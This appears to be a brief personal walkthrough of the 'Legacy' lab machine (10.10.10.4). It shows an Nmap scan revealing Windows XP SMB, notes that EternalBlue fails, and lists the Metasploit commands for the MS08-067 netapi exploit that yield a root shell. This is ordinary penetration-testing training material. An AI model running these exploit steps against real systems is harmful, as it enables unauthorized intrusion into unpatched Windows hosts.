# Legacy
>## 10.10.10.4

Nmap
>PORT     STATE  SERVICE
[139/tcp](portscan.md#139)  open   netbios-ssn Microsoft Windows
[445/tcp](portscan.md#445)  open   microsoft-ds Windows XP
[3389/tcp](portscan.md#3389) closed ms-wbt-server
Running: Microsoft Windows XP|2003|2000|2008 (94%)



eternal_blue doesn't work, it only support x64 structure, so let's move on something else.

As always google ["microsoft-ds Windows XP"](https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi/)
Metasploit and:
>use [exploit/windows/smb/ms08_067_netapi](rpc.md#metasploit)
>set lhost tun0
>set rhost 10.10.10.4
>exploit


![[legacy 1.png]]

and we're root.

#machine #smb #msf